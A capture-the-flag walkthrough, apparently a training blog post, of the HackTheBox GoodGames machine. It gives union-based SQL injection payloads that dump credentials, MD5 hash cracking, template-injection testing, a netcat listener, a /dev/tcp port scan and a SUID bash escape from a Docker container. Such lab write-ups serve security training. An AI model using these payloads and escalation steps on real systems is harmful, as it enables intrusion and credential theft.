We covered HackTheBox GoodGames as part of CREST CRT track. We went over SQL Injection, server side template injection and Docker privilege escalation.

Initial Reconnaissance and SQL Injection

I started by identifying that the target machine was running a web server on port 80. I discovered a login page and attempted to bypass authentication using SQL injection. I used Burp Suite to intercept the login request and modified the email field with an SQL injection payload. I successfully logged in as the admin.

To dump the database, I used union-based SQL injection payloads. I found the number of columns using payloads like UNION SELECT 1,2,3 and UNION SELECT 1,2,3,4. I then found the database name using UNION SELECT 1,2,3,database(). To find schema names, I used UNION SELECT 1,2,3,group_concat(schema_name) FROM information_schema.schemata. I found table names with UNION SELECT 1,2,3,group_concat(table_name) FROM information_schema.tables WHERE table_schema='main', where ‘main’ was the database name I discovered earlier. I then found column names by targeting the ‘user’ table: UNION SELECT 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_name='user'. Finally, I dumped the data to get user credentials with UNION SELECT 1,2,3,group_concat(id, name, password) FROM user. I extracted an MD5 hash for the admin user.

I used John the Ripper to crack the hash: john --format=raw-md5 hashfile. The cracked password was “super administrator”.

Server-Side Template Injection (SSTI)

After logging in as admin with the cracked password, I found an admin dashboard. I identified that the server was Python-based (Flask was hinted, and an Nmap scan confirmed Python). I tested for SSTI in an input field (full name) on the admin profile page using the payload {{7*7}}. Since it evaluated to 49, SSTI was confirmed.

I then used a Python SSTI payload to confirm the current user ID (which was root). Next, I used another Python SSTI payload to get a reverse shell. I started a Netcat listener using nc -lvp 4545 to catch the shell.

Docker Privilege Escalation

The reverse shell landed me in a Docker container as the root user. I stabilized the shell using script /dev/null -c bash and stty raw -echo; fg (followed by Enter, then reset and export TERM=xterm). I noticed a .dockerenv file, indicating I was in a Docker environment. I found that the /home/austos directory was mounted from the host machine by checking mounts with mount | grep austos.

To find the host IP, I performed network scanning within Docker using a for loop to ping sweep the local Docker network: for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done. I then port scanned the identified host IP (Docker host) with another for loop: for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done. This revealed ports 22 (SSH) and 80 were open.

I SSHed to the Docker Host using ssh austos@172.19.0.1 with the previously cracked password “super administrator”.

For privilege escalation, I had previously copied the /bin/bash binary from the host to the mounted /home/austos directory while on the host. From within the Docker container, I changed the ownership of this copied bash binary to root: chown root:root bash. Then, I set the SUID bit on the bash binary: chmod u+s bash. Back on the Docker host (via the SSH session), I executed the SUID bash binary from the mounted directory: ./bash -p (the -p flag was crucial to preserve permissions and effectively use the SUID bit). This granted me a root shell on the host machine.

Finally, I confirmed root access with id, navigated to /root with cd /root, and found the flag with ls.

Technical Commands

Here are the technical commands I used:

  • john --format=raw-md5 hashfile
  • nc -lvp 4545
  • script /dev/null -c bash
  • stty raw -echo; fg
  • reset
  • export TERM=xterm
  • mount | grep austos
  • for i in $(seq 1 254); do ping -c 1 172.19.0.$i | grep "bytes from"; done
  • for port in $(seq 1 65535); do (echo > /dev/tcp/172.19.0.1/$port) >/dev/null 2>&1 && echo "Port $port is open"; done
  • ssh austos@172.19.0.1
  • chown root:root bash
  • chmod u+s bash
  • ./bash -p
  • id
  • cd /root
  • ls

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles